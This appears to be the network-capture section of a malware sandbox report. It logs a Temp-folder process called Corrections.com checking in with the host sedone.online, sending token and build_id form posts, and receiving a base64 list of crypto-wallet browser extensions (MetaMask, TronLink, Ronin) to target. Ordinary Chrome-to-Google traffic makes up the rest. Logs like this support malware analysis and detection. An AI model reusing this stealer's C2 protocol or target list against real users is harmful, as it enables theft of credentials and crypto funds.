2024-12-15 19:47:36 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 35 38 47 56 4b 36 58 54 32 56 41 41 41 49 45 33 4f 38 59 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 35 38 47 56 4b 36 58 54 32 56 41 41 41 49 45 33 4f 38 59 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 35 38 47 56 4b 36 58 54 32 56 41 41 41 49 45 33 4f 38 59 35 0d 0a 43 6f 6e 74 Data Ascii: ------58GVK6XT2VAAAIE3O8Y5Content-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------58GVK6XT2VAAAIE3O8Y5Content-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------58GVK6XT2VAAAIE3O8Y5Cont
2024-12-15 19:47:37 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:47:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:47:37 UTC	5837	IN	Data Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49744	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:47:38 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----WL68Q90R9H47QI5FKFUK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:47:38 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 57 4c 36 38 51 39 30 52 39 48 34 37 51 49 35 46 4b 46 55 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 57 4c 36 38 51 39 30 52 39 48 34 37 51 49 35 46 4b 46 55 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 57 4c 36 38 51 39 30 52 39 48 34 37 51 49 35 46 4b 46 55 4b 0d 0a 43 6f 6e 74 Data Ascii: ------WL68Q90R9H47QI5FKFUKContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------WL68Q90R9H47QI5FKFUKContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------WL68Q90R9H47QI5FKFUKCont
2024-12-15 19:47:39 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:47:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:47:39 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49745	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:47:40 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----8Q1DJMYMYMYU3ECJMGDT User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 5961 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:47:40 UTC	5961	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 38 51 31 44 4a 4d 59 4d 59 4d 59 55 33 45 43 4a 4d 47 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 38 51 31 44 4a 4d 59 4d 59 4d 59 55 33 45 43 4a 4d 47 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 38 51 31 44 4a 4d 59 4d 59 4d 59 55 33 45 43 4a 4d 47 44 54 0d 0a 43 6f 6e 74 Data Ascii: ------8Q1DJMYMYMYU3ECJMGDTContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------8Q1DJMYMYMYU3ECJMGDTContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------8Q1DJMYMYMYU3ECJMGDTCont
2024-12-15 19:47:41 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:47:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:47:41 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49746	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:47:41 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----8Q1DJMYMYMYU3ECJMGDT User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 489 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:47:41 UTC	489	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 38 51 31 44 4a 4d 59 4d 59 4d 59 55 33 45 43 4a 4d 47 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 38 51 31 44 4a 4d 59 4d 59 4d 59 55 33 45 43 4a 4d 47 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 38 51 31 44 4a 4d 59 4d 59 4d 59 55 33 45 43 4a 4d 47 44 54 0d 0a 43 6f 6e 74 Data Ascii: ------8Q1DJMYMYMYU3ECJMGDTContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------8Q1DJMYMYMYU3ECJMGDTContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------8Q1DJMYMYMYU3ECJMGDTCont
2024-12-15 19:47:42 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:47:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:47:42 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49752	142.250.181.132	443	1228	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:47:45 UTC	607	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-15 19:47:46 UTC	1266	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 19:47:46 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-3GFPX0REayyTjaInFcHqfg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-15 19:47:46 UTC	124	IN	Data Raw: 38 31 35 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 73 61 6e 74 61 63 6f 6e 20 6e 79 63 20 62 61 72 20 63 72 61 77 6c 22 2c 22 6c 75 6b 65 20 61 6c 74 6d 79 65 72 22 2c 22 63 6f 72 79 78 6b 65 6e 73 68 69 6e 20 6d 61 6e 67 61 22 2c 22 6e 69 6e 74 65 6e 64 6f 20 73 77 69 74 63 68 20 32 20 6c 65 61 6b 73 22 2c 22 77 65 61 74 68 65 72 20 66 6f 72 65 63 61 73 74 20 73 6e 6f 77 Data Ascii: 815)]}'["",["santacon nyc bar crawl","luke altmyer","coryxkenshin manga","nintendo switch 2 leaks","weather forecast snow
2024-12-15 19:47:46 UTC	1390	IN	Data Raw: 20 73 74 6f 72 6d 22 2c 22 64 65 63 65 6d 62 65 72 20 31 35 20 66 75 6c 6c 20 6d 6f 6f 6e 20 61 73 74 72 6f 6c 6f 67 79 22 2c 22 6d 65 67 61 20 6d 69 6c 6c 69 6f 6e 73 20 6a 61 63 6b 70 6f 74 20 6c 6f 74 74 65 72 79 22 2c 22 6f 6c 69 76 65 72 20 77 61 68 6c 73 74 72 6f 6d 20 62 6f 73 74 6f 6e 20 62 72 75 69 6e 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c 65 Data Ascii: storm","december 15 full moon astrology","mega millions jackpot lottery","oliver wahlstrom boston bruins"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google
2024-12-15 19:47:46 UTC	562	IN	Data Raw: 6e 53 44 63 32 63 56 5a 36 62 30 6c 69 61 6c 4e 4f 51 6b 39 31 55 6a 46 56 4c 33 64 43 63 6d 56 43 4d 55 77 32 55 58 42 57 55 7a 42 7a 56 58 56 48 5a 57 31 4d 53 7a 42 55 4e 45 6c 51 55 47 74 53 4e 6a 5a 75 62 58 55 78 4e 6b 64 4a 56 32 78 30 56 6e 56 30 4e 31 52 58 61 55 4a 68 4d 6d 56 77 4d 30 49 79 57 54 64 7a 54 58 46 72 63 6a 46 49 4e 58 4e 69 64 6c 52 79 4e 47 46 69 63 6b 4e 77 61 6e 4d 35 53 6b 55 7a 4f 55 74 4e 55 6d 70 4a 4f 45 59 31 52 43 74 4f 54 46 6c 58 53 6c 70 57 57 6c 4e 54 4e 32 51 77 52 48 6c 49 54 46 52 6f 52 45 56 7a 52 56 4e 34 62 31 4e 52 64 6d 31 6c 5a 58 52 44 54 6e 6c 6f 65 58 6c 4c 51 56 68 6d 55 6d 38 77 59 57 39 56 53 7a 55 78 4d 57 51 78 55 56 70 6b 5a 32 38 34 65 57 4e 68 56 33 56 4c 54 30 70 74 64 45 34 77 62 32 4a 6d 52 58 Data Ascii: nSDc2cVZ6b0lialNOQk91UjFVL3dCcmVCMUw2UXBWUzBzVXVHZW1MSzBUNElQUGtSNjZubXUxNkdJV2x0VnV0N1RXaUJhMmVwM0IyWTdzTXFrcjFINXNidlRyNGFickNwanM5SkUzOUtNUmpJOEY1RCtOTFlXSlpWWlNTN2QwRHlITFRoREVzRVN4b1NRdm1lZXRDTnloeXlLQVhmUm8wYW9VSzUxMWQxUVpkZ284eWNhV3VLT0ptdE4wb2JmRX
2024-12-15 19:47:46 UTC	90	IN	Data Raw: 35 34 0d 0a 58 51 57 74 59 4d 31 68 56 59 6e 56 6d 59 57 68 56 65 58 64 74 54 7a 45 77 51 33 64 4e 55 6d 64 54 65 6c 42 32 53 54 6c 73 51 58 68 75 4d 7a 42 6f 64 6c 55 78 51 6d 35 4f 56 54 42 36 4c 30 46 45 51 6d 5a 6d 4f 46 68 6a 5a 48 64 69 63 6d 35 51 62 6e 4a 0d 0a Data Ascii: 54XQWtYM1hVYnVmYWhVeXdtTzEwQ3dNUmdTelB2STlsQXhuMzBodlUxQm5OVTB6L0FEQmZmOFhjZHdicm5QbnJ
2024-12-15 19:47:46 UTC	1311	IN	Data Raw: 35 31 38 0d 0a 7a 52 30 73 34 56 31 68 69 53 57 4e 75 53 56 6b 32 5a 7a 46 6d 56 30 39 71 56 57 51 33 53 30 78 36 65 45 4a 6b 53 33 4e 6d 54 7a 4e 58 63 58 46 4a 52 32 78 33 63 58 6c 72 54 6a 4e 57 51 6b 6f 31 61 31 6f 31 61 7a 51 77 4b 31 64 59 61 58 56 50 4e 47 4e 54 56 6d 78 72 61 31 64 4f 57 6a 52 73 59 56 4a 4f 63 44 5a 78 52 33 68 6e 4b 33 5a 71 63 45 46 74 59 56 70 45 52 30 39 52 59 54 5a 47 62 6a 63 72 56 6a 42 33 54 30 56 5a 5a 57 5a 4a 64 6e 4d 77 62 32 35 6b 5a 55 35 49 64 6d 35 48 62 6a 52 77 56 30 56 52 4d 47 31 34 62 31 6c 5a 4f 44 55 72 53 45 67 78 52 32 5a 56 62 6d 31 6d 5a 6a 41 77 4d 54 6c 76 62 6b 56 4f 62 48 5a 47 62 57 6f 72 56 48 56 4f 55 45 35 50 59 56 52 45 53 55 63 33 64 31 6c 5a 53 55 64 45 4e 6a 55 78 54 45 77 7a 53 6b 5a 4b 5a Data Ascii: 518zR0s4V1hiSWNuSVk2ZzFmV09qVWQ3S0x6eEJkS3NmTzNXcXFJR2x3cXlrTjNWQko1a1o1azQwK1dYaXVPNGNTVmxra1dOWjRsYVJOcDZxR3hnK3ZqcEFtYVpER09RYTZGbjcrVjB3T0VZZWZJdnMwb25kZU5Idm5HbjRwV0VRMG14b1lZODUrSEgxR2ZVbm1mZjAwMTlvbkVObHZGbWorVHVOUE5PYVRESUc3d1lZSUdENjUxTEwzSkZKZ
2024-12-15 19:47:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49753	142.250.181.132	443	1228	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:47:46 UTC	510	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-15 19:47:47 UTC	1018	IN	HTTP/1.1 200 OK Version: 704583840 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sun, 15 Dec 2024 19:47:46 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-15 19:47:47 UTC	372	IN	Data Raw: 31 36 63 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 16cd)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-12-15 19:47:47 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2024-12-15 19:47:47 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2024-12-15 19:47:47 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
